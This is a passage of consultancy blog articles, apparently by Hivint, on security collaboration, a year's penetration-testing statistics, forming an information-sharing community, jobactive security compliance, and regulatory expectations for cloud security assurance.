Our belief is that while “the 1%” of attacks — the APTs from China — get all the media love, we can do a lot of good by helping organisations with very practical and pragmatic support to address the 99% of attacks that aren’t State-sponsored zero-days. Templates, guidelines, lists of risks, sample documents, and other highly practical material is the core of what organisations really need.

What if a project is really, really sensitive?

Once project outcomes are de-identified and de-sensitised, they’re often still very valuable to others, and not really of any consequence to the originating company. If you’re worried about it, you can review the resources before they get published.

So how does it work?

  1. You give us a problem; we’ll scope it, quote it, and deliver it with expert consultants. (This part of the experience is the same as your current consulting engagements.)
  2. We offer a reduced fee for service delivery (percentage reduction dependent on re-usability of output).
  3. Created resources, documents, and de-identified findings become part of our portal for community benefit.

Great. Where to from here?

There are two things we need right now:

  1. Consulting engagements that drive the content creation for the portal. Give us the chance to pitch our services for your information security consulting projects. We’ve got a great team, the costs are lower, and you’ll also be helping our vision of “community driven security” become a reality. Get in touch and tell us about your requirements to see how we can help.
  2. Sign up for the portal (you’ve done this bit!) and get involved — send us some questions, download some documents, subscribe if you find it useful.
And of course we’d welcome any thoughts or input. We are investing a lot into this, and are excited about the possibilities it is going to create.


Article by Nick Ellsmore, Chief Apiarist, Hivint

Hivint’s 2016–17 Tech Year in Review

Over the course of the 2016–17 financial year, Hivint completed 117 technical security assessments ranging from source code reviews through to whole of organisation penetration tests for our clients.

One of our driving values is collaboration, so in this spirit, we wish to share statistics and observations about our year.

We hope that by sharing this information, we’ll provide an insight into the security assurance activities delivered by an Australian cyber-security consultancy. We also hope that over time, we’ll be able to identify and present trends in the evolving nature of assurance activities — supported by clear facts and figures as opposed to general observations.

Engagements

Our security assessments were delivered to Australian and international clients across a wide-range of industries, with the following chart providing the breakdown across industries.


It’s clear that our main clients for technical security assurance activities are positioned within the Finance, Government and Technology sectors, with approximately twice as many engagements performed in each of these sectors compared to the remainder. We believe that this can be attributed to:

  • The Finance industry being one of the more ‘security mature’ industries, and one that demands a high level of security assurance, as it is a common attack target given the potential for direct financial gain
  • The Technology industry maintaining a greater overall understanding of technical security risks and (similar to the Finance industry) demanding a high level of security assurance
  • The Government sector, through its sheer size and its need to obtain general periodic security assurance

The engagements completed varied greatly in the work effort, target and type of assessment performed. The 117 assessments undertaken ranged from short, single-day vulnerability assessments (intended to provide a limited, final quality assurance on a new system) to multi-month organisation wide penetration testing and vulnerability assessment activities. Engagements included configuration reviews, testing of hardware / IoT devices, mobile and web applications, wireless and network infrastructure, source code reviews and more, with web application testing being the most common assessment type (being the primary focus of 50 of the 117 assessments completed).

Findings

Through the 117 assessments undertaken, a total of 720 findings were identified. Findings which were deemed to not present a security risk (i.e. informational findings) are not included in this total.

To assess the risk of our security findings, Hivint employs an ISO 31000 aligned risk assessment framework, with common likelihood, impact and overall risk criteria applied across engagements. The table below provides a breakdown of the number and severity of findings.


The below chart provides the breakdown of the number of findings (from the Extreme down to Very Low risk severity) for each of the different industries.


Based on these ‘raw’ numbers, it’s clear that the majority of findings are presented as Low risks, with the number of findings tapering off as the risk severity increases. It is acknowledged however that these ‘raw’ numbers may be skewed due to the number and type of engagements performed for that industry — such that if the technology sector underwent the most engagements, then it seems reasonable that it would have the highest number of findings. To reduce this potential skew, the following chart has been provided which includes an average of the number of findings (for each risk rating) across the number of engagements completed for all clients in that industry sector.


With this normalised data, all industry sectors (except one) followed a fairly predictable pattern of having higher numbers of lower-risk issues and lower numbers of high-risk issues. More mature industry sectors (such as Financial Services and Technology) showed a much more rapid drop-off as the risk of the issues increased: for these sectors, High risk issues presented at a much lower rate as a proportion of all issues, with the ratio of Low:High issues in Finance, Technology, Legal and some others being roughly 10–20:1. This is contrasted with Sports, which is closer to 2:1.

We interpret this as a reflection of the focus over recent years in closing off the higher risk issues in industries such as Finance and Technology and the higher frequency with which tests have been completed against these systems.

A clear outlier in the total data set is the Retail sector, which presented a higher average number of High risks than Low risks. Whilst in general we believe that the Retail sector doesn’t have the same security maturity as sectors such as Finance and Technology, we expect that this level of High risk findings is an anomaly, and we will be interested to review next year’s data to identify whether a similar ratio of Low:High findings is present.

Monthly Breakdown

Across the year, there is a clear set of peaks by way of the number of security assessment engagements, and subsequently number of findings identified each month. The below chart presents the number of engagements and findings per month across the 2016–17 period.


The data in the above chart aligns with our experience working in this industry, something that we’ve seen in place for more than 10 years. The peak periods are the lead-up to the end of the financial year and the calendar year, which we attribute primarily to:

  • The need to complete projects prior to the end of a forecast cycle (which in Australia is largely prior to the Christmas holiday period — “I need the project in by Christmas”), and
  • The need to expend budget prior to the end of a financial cycle (which in Australia is primarily end of June).

We will be interested to see if the number of engagements across approximately November 2017 through to March / April 2018 increases as a result of entities seeking increased security assurance prior to mandatory data breach notification[i] requirements coming into effect in February 2018 (applicable to entities subject to the Privacy Act 1988).

Common Weaknesses

To categorise our findings, we follow the Web Application Security Consortium (WASC) Threat Classifications[ii] where possible. This allows us to remain consistent between engagements, and provides for a transparent view of categorisation.

Out of the 720 findings categorised against the WASC classifications, the top 10 categories comprised 88% of all findings. The below chart visualises the top 10 weakness categories that we found across the year:


The most common type of risk found was Application Misconfiguration, which is a fairly wide issue category — usually encountered when an application is not configured with security in mind — and includes issues such as a lack of security headers, or having default files disclose configuration details and application version information. The second most common was Insufficient Authentication, which can be seen when issues such as default credentials are in use, or if the application suffers from username enumeration.

Interestingly, the majority of findings relate to the insecure configuration of the target system (application, operating system, network device etc.), or failing to keep the system patched to address known security issues. In a large number of our assessments, the targets are off-the-shelf systems that do not include any custom development by the implementing organisation, only configuration. Whilst it is recognised that some of these security findings are outside of the control of the implementing organisation (vulnerabilities in the software itself), in the majority of instances if the implementing organisation was to:

  1. Follow vendor implementation guidance for secure configuration of the system (as well as any underlying infrastructure), and
  2. Keep the system patched,

then many of these findings would not exist.

Conclusion

We are clearly not yet at the point where security is so well ‘baked in’ to solutions that security assurance through hands-on testing and analysis of systems is unnecessary.

Anecdotally, we do see that organisations which invest in security earlier in the lifecycle (e.g. defining solution security requirements, performing security threat modelling, undertaking security design reviews and code assessments) result in fewer and less severe findings when implementation testing (such as a vulnerability assessment) is performed against the solution. Those that first introduce security into the project lifecycle through a vulnerability assessment a week before go-live are typically the ones with the greatest number (and higher severity) of findings.

Additionally, as the industry progresses to the use of more and more commoditised services (e.g. Software as a Service) and the number of bespoke applications reduces as a percentage of all deployments, we expect that the number of security ‘misconfigurations’ will increase as a percentage of overall findings due to a reduction in unique security vulnerabilities. We also hope that such a migration will reduce the total number of findings through our engagements, as an increasing number of ‘secure by default’ settings become ingrained into offerings.

Finally, we plan to keep an eye on developments across industry and relevant legislation, such as mandatory breach reporting in Australia and the impacts on Australian entities stemming from the EU’s General Data Protection Regulation. We expect that these macro-level changes will filter through to the number and types of security activities (including security assessments) that are executed, and it will be interesting to see if next year’s data-set indicates any impact from these types of initiatives.

We hope that the data presented here has provided you with some useful insight into Hivint’s 2016–17 technical assessment activities. If you would like to see more material that we’ve shared from our engagements — such as security test cases, cheat sheets, common security findings and more — sign up for a free subscription to our collaboration portal at https://portal.securitycolony.com/register.


Contributors: Aaron Doggett, Sam Reid, Cameron Stokes, and Jordan Sinclair


[i] Introduced through the Privacy Amendment (Notifiable Data Breaches) Act 2017 and defined as the Notifiable Data Breaches scheme. Additional details here: https://www.oaic.gov.au/engage-with-us/consultations/notifiable-data-breaches/

[ii] http://projects.webappsec.org/w/page/13246978/Threat%20Classification

Cybersecurity Collaboration

Establishing a security Community of Interest


Hivint is all about security collaboration.

We believe that organisations can’t afford to solve security problems on their own and need to more efficiently build and consume security resources and services. Whilst we see our Security Colony as a key piece of this collaboration puzzle, we definitely don’t see it as the only piece.

Through our advisory services, we regularly see the same challenges and problems being faced by organisations within the same industry. We also see hesitation among organisations about sharing information with others, often due to perceived competitiveness, the lack of a framework to enforce sharing, a fear of sharing too much information, and privacy concerns.

We believe it is important for organisations to realise that, when it comes to security, they are competing not against each other but against threats, and that working together to solve common security challenges is vital. We want to help make that happen. One such way — and the purpose of this article — is for a group of similar organisations to form a security Community of Interest (CoI).

This article outlines our suggested approach towards establishing and running a CoI, covering off a number of common concerns regarding the operation of such a community, and concludes with a link to a template that can be used by any organisation wishing to establish such a CoI.

Why is information sharing good?

Security information sharing and collaboration helps ensure that organisations across the industry learn from each other, leading to innovative thinking to deter cyber criminals. Our earlier blog post, Security Collaboration — The Problem and Our Solution, provides a detailed outlook on security collaboration.

We consider security collaboration vital to changing the economics of cyber-crime, and as such we share what works and what doesn’t by making the output of our consulting engagements available on our Security Colony Portal.

However, we acknowledge that there are times when sharing could be more direct, with a group of organisations forming a closer collective. Documents and resources could then be shared that are more specific to their industry (for example, acceptable use policies may be very similar across universities), or more sensitive in nature, such that it would be unreasonable to share them publicly (for example, security issues that have not yet been effectively solved).

When does a Community of Interest work?

Sharing of information is most effective when a collective group is interested in a similar type of information. An example of this may be university institutions — while distinct entities will have different implementations, the overall challenges that each faces are likely to be similar. Pooling resources such as policies, operating procedures and, to an extent, metrics provides a way to maximise the performance of the group as a whole, while minimising duplication of effort.

When is Community of Interest sharing a bad idea?

Sharing agreements like a CoI will not be effective in all circumstances — a CoI will only work if information flows in both directions for the organisations involved. It would not be a suitable framework for things that generally flow in a single direction, such as government reporting. A CoI’s primary focus should also not be on sharing ‘threat intel’, as there are a number of services that already do this, such as CERT Australia, Open Threat Exchange, McAfee Threat Intelligence Exchange and IBM X-Force, to name a few.

How is information shared within a Community of Interest?

An important aspect of a CoI is the platform used for sharing between its members. It is important to recognise that the platforms used will not be the same across all CoIs; each organisation will have unique requirements and preferences as to which platforms will be most effective in its circumstances. Platforms such as email lists and portals can be effective for sharing electronically, however meetings (whether in person or by teleconference) may be more effective in some cases.

What kind of information can be shared?

In theory, almost anything; in practice, however, there are seven major types of cybersecurity information suitable for sharing, according to Microsoft[1]. These are:

  • Details of attempted or successful incidents
  • Potential threats to business
  • Exploitable software
  • Hardware or business process vulnerabilities
  • Mitigation strategies against identified threats and vulnerabilities
  • Situational awareness
  • Best practices for incident management and strategic analysis of the current and future risk environment.

Hivint recognises that every piece of information has different uses and benefits. Sharing information such as general policy documents, acceptable use policies, or processes that an organisation struggles with or performs well can uplift cyber resilience and efficiency among businesses. These are also relatively simple artefacts that can be shared to help build initial trust in the CoI, and are recommended as a starting point.

What about privacy and confidentiality?

Keeping information confidential is fundamental to establishing trust within a CoI. To ensure confidentiality is maintained, guidelines must be established against the sharing of customer information or personal records.

Information should be de-identified and de-sensitised to remove any content that could potentially introduce a form of unauthorised disclosure / breach, and limitations should be established to determine the extent of information able to be shared, as well as the authorised use of this information by the receiving parties.
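As a simple illustration of that de-identification step, the sketch below replaces two obvious identifier types with placeholders before a document is shared. The patterns and placeholder strings are our own hypothetical examples; pattern matching alone is not sufficient for genuine de-identification, and shared material should still be reviewed by a person.

    import re

    # Illustrative patterns only; real de-identification needs more than regex.
    EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")
    IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

    def redact(text: str) -> str:
        """Replace obvious identifiers with placeholders before sharing."""
        text = EMAIL_RE.sub("[EMAIL REDACTED]", text)
        text = IPV4_RE.sub("[IP REDACTED]", text)
        return text

    sample = "Incident reported by alice@example.com from 203.0.113.42."
    print(redact(sample))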

How is a Community of Interest formed?

It is important to realise that organisations need not follow a single structure or model when setting up a CoI. Ideally, the first step is identifying and contacting like-minded people with an interest in collaborating from your network or business area. Interpersonal relationships between the personnel involved in a CoI are critical to retaining and enhancing the trust and confidence of all members. A fitting approach to creating such an environment is to initially exchange non-specific or non-critical information on a more informal basis. Considering that sharing agreements like this require a progressive approach, it is best not to jump in head first by sharing all the information pertaining to your business in the first instance.

Upon success of the first phase of sharing and development of a strong relationship between parties involved, a more formal approach is encouraged for the next phase.

Next Steps

We’ve made a Cyber Security Collaboration Framework available to all subscribers (free and paid) of Security Colony which can be used as a template to start the discussion with interested parties, and when the time comes, formally establish the CoI.

[1] ‘A Framework for Cybersecurity information sharing and risk reduction’ — https://www.microsoft.com/en-us/download/details.aspx?id=45516


Additional Information

There are a number of instances where cyber-security information sharing arrangements have been established around the world. The below provides links to a small number of these.

http://data.cambridgeshire.gov.uk/data/information-management/info-sharing-framework/cambs-information-sharing-framework.pdf

https://corpgov.law.harvard.edu/2016/03/03/federal-guidance-on-the-cybersecurity-information-sharing-act-of-2015/

https://www.enisa.europa.eu/publications/cybersecurity-information-sharing

jobactive Case Study


Meeting the jobactive security compliance requirements

Hivint has been involved with the jobactive program since early 2015, initially undertaking the required IRAP assessment for one of the approved third party IT providers, and since then working with many different jobactive providers to help guide them through the process towards achieving security accreditation.

This post provides an overview of the compliance requirements of the program, as well as suggested steps and considerations for any entity currently planning or pursuing compliance.

About the program

The Australian Government’s jobactive program, directed by the Department of Employment (‘the Department’), is an Australia-wide initiative aimed at getting more Australians working. Through the program, jobseekers are both aided in getting prepared for work (or back to work) and connected with employers through a network of Employment Services Providers (‘providers’).

Under the program, all providers are required to be accredited by the Department as being able to deliver — and continue to deliver — services in a manner that meets various conditions. One condition (defined in item 32 of the jobactive deed) relates to the protection of data entrusted to the provider by the Department in order to deliver these services, effectively extending many of the Australian Government security requirements that apply to the Department through to these providers.

The data security requirements that all providers — as well as third parties hosting jobactive data on behalf of providers — must meet have been drawn from two Australian Government publications and one law regarding the protection of information. The publications defining the security control requirements with which providers are required to comply, as well as the number of controls drawn from each, are as follows:

jobactive Statements of Applicability

Rather than taking a ‘big bang’, all-or-nothing approach — where providers are required to be compliant with all controls by a specific date — the Department has introduced a graduated approach to achieving compliance. This has been developed through the definition of three individual compliance stages defined within the jobactive Statements of Applicability (SoA), with the requirement for compliance phased across an approximately three-year period.

The perceived intent here is to start providers off with the need to establish a baseline security capability that is then matured with more advanced and complex controls over time. The overall timeframe for compliance, and the number of controls in each stage and SoA, are as follows:


The graph below shows the breakdown of these SoAs as drawn from the three input documents. What is evident is that SoA 1 covers a broad set of controls across most of the ISM security domains and the Privacy Act, providing a general security baseline for providers.

Progressing through the program (SoA 2 through to SoA 3), security becomes more focused on specific domains and extends to include more advanced and complex technical controls within the framework.


Assessment requirements

It’s easy to see that the lion’s share of the requirements has been drawn from the ISM, which reflects the Department’s focus on addressing information security through cyber security controls.

The Department has leveraged the existing register of security professionals already authorised to complete formal assessments of systems against the ISM for certification and accreditation by government bodies. The Information Security Registered Assessor Program (IRAP) list of assessors is maintained by the Australian Signals Directorate (ASD), the same body that is responsible for the ISM.

The Department has given providers the option to undertake a self-assessment for the first compliance assessment, but requires formal assessments by IRAP assessors for stages 2 and 3. These assessments are as follows:

  • The first assessment is a self-assessment, whereby providers complete their own assessment against the controls defined in SoA 1 and report their findings to the Department for review.
  • The second assessment is required to be completed by an IRAP assessor, with assessment coverage of controls defined in both SoA 1 and SoA 2.
  • The third assessment is also required to be completed by an IRAP assessor, and so long as the risk profile or environment hosting jobactive data hasn’t significantly changed, the assessment may be completed against the controls in SoA 3 only (we recommend validating this position with the IRAP assessor and Department prior to conducting this assessment).
  • From this point, the provider is required to undergo assessment at least once every three years — potentially sooner if the Department requests a new assessment based on factors such as a change in governance arrangements, changing cyber threats or other factors that change the IT security landscape for the provider.

Where to start

Achieving a level of compliance acceptable to the Department against the full set of security controls reflected across the SoAs can be a daunting task for many providers. We’ve worked with a variety of providers, from small, single-office not-for-profits through to large, Australia-wide commercial providers, and each has needed to invest considerable time and effort to achieve the target compliance posture.

However, regardless of the size, scope and overall security maturity of the providers we’ve worked with, the general approach that we’ve successfully employed with each has the same main principles and phases:

  • Phase 1 — Scope Definition, Reduction and Validation
  • Phase 2 — Risk and Control Definition
  • Phase 3 — Control Implementation & Refinement
  • Phase 4 — SoA 1 and 2 Assessment
  • Phase 5 — Control Implementation & Refinement
  • Phase 6 — SoA 3 Assessment

A high level overview of the first two phases is provided below.

Phase 1 — Scope Definition, Reduction and Validation

This is a crucial first step that is often overlooked by providers. We strongly believe that proper planning greatly increases the likelihood of an overall successful initiative, both financially and operationally, reducing the risk of unnecessary and wasteful investment and clearly establishing the bounds for compliance. We recommend that providers undertake each of the following; whilst not mandated, engaging an IRAP assessor to assist through the process can speed this activity up and improve the outcomes considerably.

1. Establish your scope. It’s often not clear exactly what data is subject to the Department’s requirements (Is it only data retrieved from Employment systems? What about data provided directly from jobseekers? Data that is obtained from other providers? And so on…). Knowing what’s in scope and what isn’t can help ensure that you focus your compliance efforts appropriately; a sketch of one way to record the resulting flows follows this list. We recommend that providers:

  • Identify jobseeker information coming into the organisation. Document the Employment systems from which you retrieve or access jobseeker information, the method by which you obtain it, and the type of information that you retrieve.
  • Identify where you build on this information. Document instances where you build on this information through other sources (e.g. jobseeker-provided information) and, again, capture the type of information that you obtain and the method by which you obtain it.
  • Identify who you share this information with. Document instances where you share information with third parties in support of jobseeker services.
  • Define your business process. Capture the above processes together as a set of workflows, outlining the relevant actors, information types and actions performed.
  • Overlay these processes across your environment. Overlay these processes across your physical, personnel and IT environments — including those hosted by third parties, such as Department accredited entities, ASD certified providers, or any other entity (don’t forget to include support processes such as offsite backups, or remote connections from IT service providers into your environment).
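One lightweight way to record the flows identified above is as structured entries that can be tabled with the Department and your IRAP assessor. The sketch below is a hypothetical illustration only; the field names and sample entries are ours, not a Departmental format.

    from dataclasses import dataclass

    @dataclass
    class InformationFlow:
        """One jobseeker-data flow into, within or out of the environment."""
        source: str        # e.g. an Employment system, or the jobseeker directly
        destination: str   # where the data lands: internal system, third party
        data_types: str    # the kinds of jobseeker information involved
        method: str        # how it moves: web portal, API, paper form, email

    # Hypothetical entries showing the shape of a scope register.
    flows = [
        InformationFlow("Employment system", "Provider CRM",
                        "contact details, job referrals", "web portal export"),
        InformationFlow("Jobseeker", "Provider CRM",
                        "resume, bank details", "in-office intake form"),
    ]

    for f in flows:
        print(f"{f.source} -> {f.destination}: {f.data_types} via {f.method}")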

2. Validate your scope. Engage with the Department’s Security Compliance team to discuss what you have established, and seek input as to whether you are able to remove certain entities, information types and processes from your scope. The Department may also be able to assist by providing upfront guidance on critical / high-risk issues with your practices (e.g. storing jobactive data offshore with a non-approved provider).

3. Define a plan to reduce your scope. This is an optional activity whereby a provider may wish to reduce or otherwise change their scope to reduce their compliance exposure. Some entities have taken the path of applying the controls to their entire business (as they are seen as good-practice security controls, regardless of the data types that they are protecting), and others have reduced their scope by changing or consolidating systems and business processes utilising jobactive data.

4. Review the SoAs and remove controls that don’t apply. The SoAs contain a combined 409 security controls; however, not all apply to all providers. Rather than investing in unnecessary compliance expenditure, documenting the controls that the provider considers out of scope, together with the justification for each, can save a lot of effort. For example:


5. Validate your revised scope. Following any documented proposal to reduce your environment scope and / or remove controls from the SoA, validation with the Department and / or your IRAP assessor is critical. Only once the revised scope has been validated should you implement the changes.

Phase 2 — Risk and Control Definition

Once the scope has been established, providers are in a position to define and implement controls to meet the Department’s security compliance requirements.

Our immediate recommended next step is for providers to formally assess their security risk posture, and then begin to establish the key overarching security artefacts that will govern their security controls. This includes:

  • Document the Security Risk Management Plan (SRMP) — this document captures the various security risks to jobactive data within the provider’s scoped environment, as well as the controls in place, and planned to be in place, to mitigate these risks to an acceptable level.
  • Define the System Security Plan — this document is derived from the SRMP, the environment scope, and the Department’s SoAs and describes the implementation and operation of security controls for the system.
  • Define the security documentation framework — various documents which collectively detail the provider’s security controls. This typically comprises security policies, standards, plans and procedures.

We recognise that many providers have not previously needed to establish the majority of the above, and we suggest that you refer to the ISM Controls Manual for further detail describing each of the required documentation artefacts, or alternatively get in touch with an IRAP assessor to assist.

Phase 3 and Beyond

From this point, providers should be well positioned to implement the various controls defined, and then progress towards the required SoA 1 self-assessment, and subsequent IRAP assessments.

At this stage, providers may also wish to undertake a compliance gap assessment against the controls across the SoAs to help identify the overall compliance posture, and inform the prioritisation, as well as overall resourcing and investment in the compliance initiative.

Maintaining an IRAP Assessor (or alternatively, an individual with previous experience in adopting the ISM control framework) in an advisory capacity throughout this process* can also help ensure that the provider stays on track.

Need a Hand?

Hivint maintains a team of IRAP Assessors and security consultants across Australia with extensive experience in Federal Government security requirements and the development and application of ISM security control frameworks and compliance strategies.

If you have any questions regarding the Department’s security compliance requirements, or if you may need a hand in working out where to start (or how to progress), please get in touch with us here.


Case Study by Aaron Doggett, Regional Director, Hivint

* To remove any potential conflict of interest, the IRAP Assessor engaged to perform the formal assessments must not also operate in an advisory / consulting capacity to the provider.

The Cloud Security Challenge

As the use of cloud services continues to grow, it’s generally well accepted that in most cases reputable service providers are able to use their economies of scale to offer levels of security in the cloud that match or exceed what enterprises can establish for themselves.


What is less clear is whether there are currently appropriate mechanisms available to enable an effective determination of whether the security controls a cloud service provider has in place are appropriately adapted to the needs of their various customers (or potential customers). There’s also a lack of clarity as to whether providers or customers should ultimately bear principal responsibility for answering this question.

These ambiguities are particularly highlighted in the case of highly abstracted public cloud services where the organisations using them have very little ability to interact with and configure the underlying platform and processes used to provide the service. In particular, the ‘shared environment’ these types of services offer creates a complex and dynamic risk profile: the risk to any one customer of using the service — and the risk profile of the cloud service as a whole — is inevitably linked with all the other customers using the service.

This article explores these issues in more detail, including why representations around the security of cloud services are likely to become an increasingly important issue.

Why it matters: regulators are starting to care about security

It is important to appreciate the regulatory context in which the growth in the use of cloud services is taking place. Specifically, there is evidence of an increasing interest by regulators and policymakers in the development of rules around cyber security related matters[2]. This includes indications of increased scrutiny regarding representations about cyber security that are made by service providers.

Two recent cases in the USA highlight this. In one instance, the Consumer Financial Protection Bureau (a federal regulator, similar to the Australian Securities and Investments Commission) fined Dwolla — an online payment processing company — one hundred thousand US dollars after it found Dwolla had made misleading statements that it secured information it obtained from its customers in accordance with industry standards[3].

Similarly, the US Federal Trade Commission recently commenced legal proceedings against Wyndham Worldwide, a hospitality company that managed and franchised a group of hotels. After a series of security breaches, hackers were able to obtain payment card information belonging to over six hundred thousand of Wyndham’s consumers, leading to over ten million dollars in losses as a result of fraudulent transactions.

The FTC alleged that Wyndham had contravened the US Federal Trade Commission Act by engaging in ‘unfair and deceptive acts or practices affecting commerce’[4]. The grounds for this allegation were numerous, but included that Wyndham had represented on its website that it secured sensitive personal information belonging to customers using industry standard practices, when it was found through later investigations that key information (such as payment card data) was stored in plain text form.

The case against Wyndham was ultimately settled out of court, but demonstrates an increasing interest by regulators in representations made in relation to cyber security by service providers. It is not inconceivable that similar action could be taken in Australia if corresponding circumstances arose, given the Australian Competition and Consumer Commission’s powers to prosecute misleading and deceptive conduct under the Australian Consumer Law[5].

While the above cases do not apply to cloud service providers per se, they serve as examples of the increasing regulatory interest that is likely to be given to issues that relate to cyber security. Indeed, while regulatory regimes around cyber security issues are still in relatively early stages of development, it is feasible to expect that cloud providers in particular will come under increased scrutiny due to their central role in supporting the technology and business functions of a high number of customers from multiple jurisdictions.

There is also a strong likelihood that this scrutiny will extend to the decisions made by customers of cloud providers. In Australia, for example, if a company wishes to store personal information about its customers on a cloud service provider’s servers overseas, they would (subject to certain exceptions) need to take reasonable steps to ensure the cloud provider did not breach the Australian Privacy Principles in the Privacy Act 1988 in handling the information. Among other things, this would include ensuring that the cloud provider took reasonable steps to secure the information[6]. Similarly, data controllers (and data processors) in the EU will be required under the new Data Protection Regulation to ensure that appropriate technical and organisational measures are in place to ensure the security of personal data[7].

The question then arises as to how cloud service providers and their customers can make sure they take the appropriate steps to meet their responsibilities for assuring the security of cloud services, in the context of a nascent and still-developing regulatory environment. At first glance, the solution to the problem appears simple: benchmarking a cloud service against industry security standards. As discussed below, however, there are significant challenges with this approach.

The problem with benchmarking cloud security against industry standards

Many cloud service providers point to certification against standards such as ISO 27001:2013, ISO 27017, ISO 27018 (from a privacy perspective), the Cloud Security Alliance’s STAR program, or obtaining Service Organisation Control 2 / 3 reports as demonstration that their approach to security aligns with best practice. This is in addition to the option of undertaking government accreditation programs, such as IRAP in Australia or FedRAMP in the USA, avenues which some providers also pursue.

While this seems a logical approach, public cloud services and the shared environments they introduce create some unique considerations from a security perspective that complicate matters. Specifically, the potential security risk to any one customer of using these shared environments is inevitably closely intertwined with, and varies based on:

  • their own intended use of the service; and
  • the security risks associated with all other clients using the cloud service[8].


As a result, any assessment of a cloud service provider’s security is inevitably reflective of its risk profile at a specific point in time, even though the risks facing the provider may have changed since then, given its dynamic customer base. To illustrate this point, consider the hypothetical case study below.

Case study

X is a public cloud service provider that has been in business for a few years, and provides remote data storage services. X has primarily marketed itself to small businesses which make up the bulk of its customer base, and offers a highly abstracted cloud service with customers having little visibility of and ability to customise the underlying platform.

Those organisations have not stored particularly sensitive information on X’s servers. X has nevertheless obtained ISO 27001:2013 certification during this period — which includes a requirement that the cloud provider implement a risk assessment methodology and actually conduct a risk assessment process for its service on a periodic basis[9].

X is then approached by a large multi-national engineering firm, who wants to store highly sensitive information regarding key customers in the cloud to reduce its own costs. The firm wishes to engage a public cloud provider that is ISO 27001:2013 compliant and notices X meets this requirement.

X is planning to conduct a risk assessment to review its current risk profile in 3 months; however, its current set of security controls — against which it obtained ISO 27001 certification — has been designed to address the level of risk associated with customers who use its cloud services for storing relatively insensitive data.

The engineering firm is unaware of this and engages X despite the fact their security controls may not be appropriately adapted to meet its requirements.

As this case study illustrates, whether it’s appropriate for an organisation to engage a cloud provider from a security perspective isn’t a question that can be answered purely by reference to whether the provider has been deemed compliant with certain standards. The underlying assumptions upon which the cloud provider’s compliance was determined — and whether those assumptions still hold true — are just as important. Yet in many circumstances it is unlikely (and impractical to expect) that the key documents revealing those assumptions (such as risk registers and treatment plans) will be made available publicly by cloud service providers so that these investigations can be undertaken by customers. And even if this information can be made available, the customer first has to have the security maturity and awareness to know to ask for such documents, and be able to perform the required assessment.

Responsibility for cloud security — a two-way street

Given the limited utility of industry standards in assuring the security of cloud services, and the potential relevance of regulatory responsibilities that could apply to both service providers and their customers, the most reasonable argument is that both parties have a role to play in establishing that a particular cloud service offers an appropriate level of security. While it is difficult to define the precise scope of those responsibilities in the context of a nascent regulatory landscape, this article offers some guidance below.

Customers of cloud services

Customers need to make sure they conduct a sufficient level of due diligence prior to using a cloud service to ensure that its design is appropriately adapted to meet their needs from a security perspective. In particular, they should consider the following:

  • Does the cloud service create a high degree of abstraction from the underlying platform? Public cloud services, for example, often have a high level of abstraction, where users have very limited — if any — ability to configure the underlying platform. If so, this may mean the service is less suited to more sensitive uses where a high degree of control by the customer is required.
  • Is the use of a shared IT environment — in which the risk profile of the cloud service as a whole varies dynamically as its customer base changes — appropriate?
  • Are the security controls put in place by the cloud provider appropriate to satisfy the organisation’s intended use of the service?
  • Does the cloud provider make available details of security risk assessments and risk management plans?
  • Are there any other considerations that may have a bearing on whether using the cloud service is appropriate (e.g. a regulatory requirement or a strong preference to have the data stored locally rather than overseas)?

Generally speaking, the higher the level of sensitivity and criticality associated with the planned uses of a cloud service, the more cautious a customer needs to be before making a decision to use a service offered in a shared environment. If the choice is still made to proceed (as opposed to using a private cloud, for example), the reasons for this decision should be documented and subject to appropriate executive sign-off and oversight (as well as regular review). This will prove particularly valuable in case the decision is scrutinised by external bodies (e.g. regulators) at a later date[10].

Cloud service providers

It is important that cloud providers are transparent with their customers about the security measures they have in place throughout the period of the engagement. While representing that the cloud service is certified against particular industry benchmarks is useful to some extent, the cloud provider should also provide its own information to customers as to the specific security controls it does — and doesn’t — have in place, and the level of risk those controls are designed to address. In addition, cloud providers should be proactive about informing their customers where circumstances have arisen that result in a material change to their risk profile.

Providing this information is important to enable potential customers of cloud services to ascertain whether use of the service is appropriate for their needs.

Conclusion

Clearly, the shift towards the use of cloud services is now well established. This is not a problem in and of itself. However, while regulatory expectations around cyber security are still being established, organisations need to ensure that they choose a cloud service provider only after first carefully considering what their requirements are and whether the cloud service offers an approach to security and a risk profile that is adapted to their needs. Service providers need to facilitate this process as best they can through a transparent dialogue with their customers about their approach to security and their risk profile.

By Arun Raghu, Cyber Research Consultant at Hivint. For more of Hivint’s latest cyber security research, as well as access to our extensive library of re-usable cyber security resources for organisations, visit Security Colony.


  1. Note this write up focuses less on dedicated cloud environments (e.g. private cloud arrangements), where these complexities are largely avoided because a service can be customised and secured with a specific focus on a particular customer.
  2. This article does not cover this in detail, but examples include the development of the Network Information and Security Directive in the EU; the rollout of Germany’s IT Security Act; the ongoing discussions around legislated cyber security information sharing frameworks in the USA; and the proposal in late 2015 to amend Australia’s existing Telecommunications Act 1997 to include revised obligations on carriers and service providers to do their best to manage the risk of unauthorised access and interference in their networks, including a new notification requirement on carriers and some carriage service providers to notify of planned changes to networks that may make them vulnerable to unauthorised access and interference.
  3. See the regulator’s findings for details.
  4. See the FTC site for additional details on the Wyndham case.
  5. See section 18 of Schedule 2 of the Competition and Consumer Act 2010.
  6. See in particular Australian Privacy Principles 8 and 11.
  7. See Article 30 of the proposed text for the EU’s General Data Protection Regulation.
  8. The risks introduced by other clients of the cloud service may vary depending on the sector(s) in which they operate and their potential exposure to cyber-attacks as well as their intended use of the service.
  9. See in particular section 6.1 of the ISO 27001:2013 standard.
  10. A relevant consideration that may also be taken into account by regulators or other external bodies is what would reasonably be expected by an organisation of the same type in the same industry before engaging a cloud service provider — this would help ensure that unreasonable levels of due diligence are not expected of organisations with limited resources, for example.